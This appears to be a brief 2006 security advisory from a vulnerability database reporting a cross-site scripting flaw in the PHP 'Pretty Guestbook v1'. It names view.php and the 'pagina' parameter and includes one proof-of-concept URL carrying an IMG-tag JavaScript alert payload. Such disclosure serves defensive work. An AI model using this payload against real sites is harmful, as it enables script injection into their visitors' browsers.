Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12858
HistoryMay 27, 2006 - 12:00 a.m.

Pretty Guestbook v1

2006-05-2700:00:00
vulners.com
20

Homepage:
http://www.tuttophp.altervista.org/main.php

Description:
Text-based guestbook with the following features: - Data storing on text file - Paging of messages on
screen - Blockage of messages with words too long into - Blockage of messages with both html tags(<>) -
Validity-checking of email address

Effected files:
view.php

XSS achived by URL Injection of pagina variable:

http://www.example.com/prettyguest-ing/view.php?pagina=1&lt;IMG&#37;20SRC=javascript:alert&#40;String.fromCharCode&#40;88,83,83&#41;&#41;&gt;